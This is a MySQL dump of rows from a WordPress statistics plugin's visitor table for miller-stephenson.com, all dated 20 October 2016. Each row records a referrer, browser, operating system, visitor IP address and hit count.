INSERT INTO `wp_statistics_visitor` VALUES (8637, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.140.238.148', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8638, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.90.91.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8639, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.247.163.202', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8640, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '108.3.144.120', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8641, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '76.122.77.3', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8642, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.220.74.215', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8643, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.116.123.60', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8644, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '196.218.137.168', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8645, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '217.73.129.204', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8646, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '31.183.154.47', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8647, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '103.215.227.157', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8648, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.170.28.125', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8649, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.106.209.17', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8650, '2016-10-20', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8651, '2016-10-20', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwjLk6ePsOrPAhUHfiwKHQTgAuEQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw', 'MSIE', 'Windows', '11.0', '', '138.163.0.41', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8652, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.7.13.148', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8653, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '76.188.52.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8654, '2016-10-20', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/ptfe-dryfilm-lubricants/', 'MSIE', 'Windows', '11.0', '', '138.163.0.42', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8655, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '47.188.109.14', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8656, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '90.206.106.167', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8657, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '181.143.217.162', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8658, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.79.58.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8659, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '58.11.81.111', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8660, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '179.176.221.145', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8661, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.220.212.62', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8662, '2016-10-20', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.0.1', '', '72.225.50.255', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8663, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '172.7.212.190', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8664, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.116.54.109', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8665, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '208.131.161.12', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8666, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.30.232.133', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8667, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '134.161.168.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8668, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.102.64.171', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8669, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '116.75.86.152', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8670, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '68.200.130.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8671, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.5.48.116', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8672, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '101.98.204.19', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8673, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.101.220.124', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8674, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.255.42.206', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8675, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.164.74.88', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8676, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.200.187.215', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8677, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.29.239.62', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8678, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.145.128.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8679, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.86.139.132', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8680, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.247.79.205', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8681, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.68.74.127', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8682, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.146.158.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8683, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '119.159.183.246', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8684, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '51.255.56.26', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8685, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '108.207.176.14', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8686, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '173.81.160.195', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8687, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.55.210.233', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8688, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '78.90.202.85', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8689, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.79.252.57', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8690, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.251.186.200', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8691, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '196.203.37.86', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8692, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.87.213.114', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8693, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.37.138.228', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8694, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '37.105.154.73', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8695, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '134.19.247.15', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8696, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.158.42.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8697, '2016-10-20', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwjnjdqetOrPAhVHVj4KHaW0Cl4QFggsMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Flubricants%2Ftribosys-lubricants%2Fconnector-lubricants%2F&usg=AFQjCNHUfibmnSo5DfkuTd-5Mx9sov-a1Q&bvm=bv.136499718,d.cWw', 'MSIE', 'Windows', '11.0', '', '209.253.20.113', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8698, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.215.3.35', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8699, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.12.52.159', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8700, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.10.229.145', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8701, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '43.243.36.142', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8702, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '185.67.177.35', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8703, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '203.87.129.141', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8704, '2016-10-20', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '12.246', '', '131.253.38.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8705, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '179.57.185.187', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8706, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '183.88.152.24', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8707, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.166.136.168', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8708, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.33.222.83', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8709, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.254.9.185', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8710, '2016-10-20', 'https://search.yahoo.co.jp/search;_ylt=A2RA2D59QwlYuS4A_3IDJf17?p=KRYTOX+GPL+407&search.x=1&fr=top_ga1_sa&tid=top_ga1_sa&ei=UTF-8&aq=&oq=&afs=', 'MSIE', 'Windows', '11.0', '', '14.133.208.222', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8711, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '100.64.165.28', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8712, '2016-10-20', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '104.152.168.23', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8713, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.124.97.159', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8714, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '100.64.161.129', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8715, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.77.161.246', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8716, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '96.19.196.41', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8717, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.129.226.119', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8718, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '72.180.192.181', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8719, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '100.64.165.27', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8720, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '100.64.165.26', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8721, '2016-10-20', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '100.64.165.24', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8722, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.130.154.25', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8723, '2016-10-20', 'https://www.miller-stephenson.com/?gclid=CITv_cfmvcoCFYVFaQodCpwHag', 'Safari', 'iPad', '9.0', '', '107.208.232.146', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8724, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '115.178.235.101', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8725, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '73.79.233.64', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8726, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.8.236.178', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8727, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.187.0.112', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8728, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '49.148.145.213', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8729, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.237.174.48', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8730, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '43.250.80.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8731, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '94.78.84.36', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8732, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '110.12.94.101', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8733, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.168.106.239', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8734, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.160.227.138', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8735, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.230.17.248', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8736, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.140.28.48', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8737, '2016-10-20', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '173.201.216.49', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8738, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.142.108.172', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8739, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '23.28.187.142', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8740, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '111.118.251.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8741, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.184.74.200', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8742, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '189.173.74.247', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8743, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '112.198.243.3', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8744, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.109.93.124', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8745, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '129.208.50.90', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8746, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.0.188.217', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8747, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.226.101.56', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8748, '2016-10-20', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '168.215.211.182', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8749, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '202.91.68.126', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8750, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '71.244.253.70', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8751, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '210.195.119.173', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8752, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '87.13.24.64', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8753, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '173.63.26.55', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8754, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '197.225.113.234', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8755, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '186.177.156.179', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8756, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '107.221.192.238', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8757, '2016-10-20', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '193.143.77.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8758, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '95.251.42.88', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8759, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '175.143.143.67', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8760, '2016-10-20', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.190.84.251', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8761, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.102.242.21', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8762, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '99.42.107.75', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8763, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '188.49.137.218', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8764, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '154.118.7.108', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8765, '2016-10-20', 'https://www.bing.com/search?&q=+61%20chemical%20manufacturing%20companies%20email%20contact%20mail&scope=web&setmkt=pt-BR&setlang=match&first=341&cc=br', 'MSIE', 'Windows', '11.0', '', '192.168.100.142', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8766, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '110.159.176.82', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8767, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '77.203.41.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8768, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '201.176.152.223', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8769, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '177.129.238.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8770, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.126.137.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8771, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '110.76.129.38', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8772, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '62.235.14.181', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8773, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '151.255.115.231', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8774, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '89.185.196.185', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8775, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '42.113.164.207', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8776, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '105.235.137.117', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8777, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '91.150.106.251', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8778, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '174.2.57.17', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8779, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '92.97.3.109', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8780, '2016-10-20', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '134.0.11.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8781, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '182.185.96.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8782, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '185.3.119.91', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8783, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.194.168.95', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8784, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.160.195.239', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8785, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '41.223.96.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8786, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '86.92.245.29', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8787, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '178.148.145.155', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8788, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '80.153.235.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8789, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.143.21.94', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8790, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '190.199.152.110', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8791, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.98.64.193', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8792, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '88.203.72.14', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (8793, '2016-10-20', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '47.62.104.34', '000', 3, 0); 
